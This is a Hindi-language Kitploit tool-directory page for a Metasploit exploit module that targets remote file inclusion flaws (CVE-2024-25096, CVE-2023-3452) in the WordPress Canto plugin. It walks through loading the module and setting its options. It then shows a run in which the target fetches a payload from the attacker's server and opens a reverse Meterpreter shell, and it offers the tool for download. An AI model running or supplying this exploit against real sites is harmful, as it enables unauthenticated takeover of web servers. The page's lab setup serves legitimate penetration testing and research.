Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Metasploit-Wordpress-Canto-Exploit-RCE — यह CVE-2024-25096 और CVE-2023-3452 के लिए एक metasploit exploit module है | Kitploit
उपकरण/GitHubGitHub/puppetma4ster/metasploit-wordpress-canto-exploit-rce
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubpuppetma4ster/metasploit-wordpress-canto-exploit-rce

Metasploit-Wordpress-Canto-Exploit-RCE

यह CVE-2024-25096 और CVE-2023-3452 के लिए एक metasploit exploit module है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

Metersploit एक्सप्लॉइट मॉड्यूल canto RCE CVE-2024-25096 और CVE-2023-3452

यह एक्सप्लॉइट RFI भेद्यताओं CVE-2024-25096 और CVE-2023-3452 का एक proof-of-work एक्सप्लॉइट है, जो हमलावर को लक्ष्य पर एक इंटरैक्टिव रिमोट शेल सत्र स्थापित करने की अनुमति देता है।

CVE-2024-25096 abspath पैरामीटर का दुरुपयोग करता है, जो include_once स्टेटमेंट के माध्यम से रिमोट फ़ाइल समावेशन की अनुमति देता है। CVE-2023-3452 की प्रक्रिया समान है, सिवाय इसके कि “wp_abspath” पैरामीटर requiere_once स्टेटमेंट के माध्यम से रिमोट फ़ाइल समावेशन की अनुमति देता है। यह हमलावर को लक्ष्य सर्वर पर बिना प्रमाणीकरण के कोड निष्पादित करने की अनुमति देता है।

हालाँकि भेद्यता डेटाबेस CVE-2023-3452 को संस्करण 3.0.4 तक प्रभावित करने वाली सूचीबद्ध करते हैं, परीक्षण ने पुष्टि की कि यह भेद्यता संस्करण 3.0.6 तक शोषण योग्य बनी हुई है। यह मुद्दा संस्करण 3.0.7 में पैच किया गया था, वही संस्करण जो CVE-2024-25096 को ठीक करता है।

आवश्यकताएँ

लक्ष्य के भेद्य होने के लिए निम्नलिखित शर्तें आवश्यक हैं:

  • canto प्लगइन स्थापित हो (<= 3.0.6)
  • allow_url_include=On

उपयोग

परीक्षण लक्ष्य कॉन्फ़िगरेशन

इस रिपॉजिटरी को क्लोन करें और canto प्लगइन डाउनलोड करें।

Canto 3.0.4 डाउनलोड करें

Canto 3.0.5 डाउनलोड करें

Canto 3.0.6 डाउनलोड करें

ध्यान दें कि यदि आप Canto का पुराना संस्करण डाउनलोड करना चाहते हैं, तो बस लिंक कॉपी करें और लिंक में संस्करण संख्या को अपने पसंदीदा संस्करण से बदल दें।

कंटेनर (docker-compose.yaml) को podman-compose up कमांड से प्रारंभ करें। अपनी पसंद के ब्राउज़र में http://localhost:8889/wp-admin/install.php खोलें और एक WordPress खाता सेट अप करें।

Screenshot Screenshot

लॉग इन करने के बाद, आप Plugins -> Add new plugins -> Plugin Upload टैब के अंतर्गत canto ज़िप फ़ाइल का चयन करके इंस्टॉल कर सकते हैं।

Screenshot Screenshot

एक्सप्लॉइट कॉन्फ़िगरेशन

एक्सप्लॉइट (rce_exploit_cve_2024_25096.rb) को Metasploit मॉड्यूल फ़ोल्डर में जोड़ें। Metasploit प्रारंभ करें (msfconsole) और Metasploit को रीलोड करें (reload_all)। पेलोड चुनें।

root@kitploit:~
cp explit/wordpress_canto_plugin_file_include_rce.rb ~/.msf4/modules/exploits/
msfconsole
reload_all
search rce_exploit_cve_2024_25096
use 0

आवश्यक वेरिएबल्स के मान सेट करें।

root@kitploit:~
Module options (exploit/rce_exploit_cve_2024_25096):

   Name        Current Setting            Required  Description
   ----        ---------------            --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS      127.0.0.1                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8889                       yes       Port
   SRVHOST     0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     8080                       yes       The local port to listen on.
   SSL         false                      yes       Use SSL
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TARGETFILE  get.php                    yes       Vulnerable PHP file
   TARGETURI   /wp-content/plugins/canto  yes       Path to cantos root directory
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.178.58   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress Plugin <= 3.0.6



View the full module info with the info, or info -d command

एक्सप्लॉइट चलाएँ और सर्वोत्तम की आशा करें ;)

root@kitploit:~
[msf](Jobs:0 Agents:0) exploit(rce_exploit_cve_2024_25096) >> run
[*] Started reverse TCP handler on 192.168.178.58:4444 
[*] Starting HTTP server...
[*] Using URL: http://192.168.178.58:8080/14Gs3AAu8j4
[*] Triggering RFI...
[*] Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.178.58
[*] Meterpreter session 2 opened (192.168.178.58:4444 -> 192.168.178.58:54310) at 2026-03-01 20:15:23 +0100
[*] Server stopped.

(Meterpreter 2)(/var/www/html/wp-content/plugins/canto/includes/lib) >

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

लेखक अवैध गतिविधियों को प्रोत्साहित या समर्थन नहीं करता है। बिना अनुमति के सिस्टम पर हमला करने के लिए इस कोड का कोई भी उपयोग सख्त वर्जित है।

लेखक इस सॉफ़्टवेयर के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि वे सभी लागू कानूनों और विनियमों का अनुपालन करें।

इस कोड का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास स्पष्ट अनुमति हो, जैसे लैब वातावरण, पेनेट्रेशन टेस्टिंग कार्य, या सुरक्षा अनुसंधान।

टूल डाउनलोड करें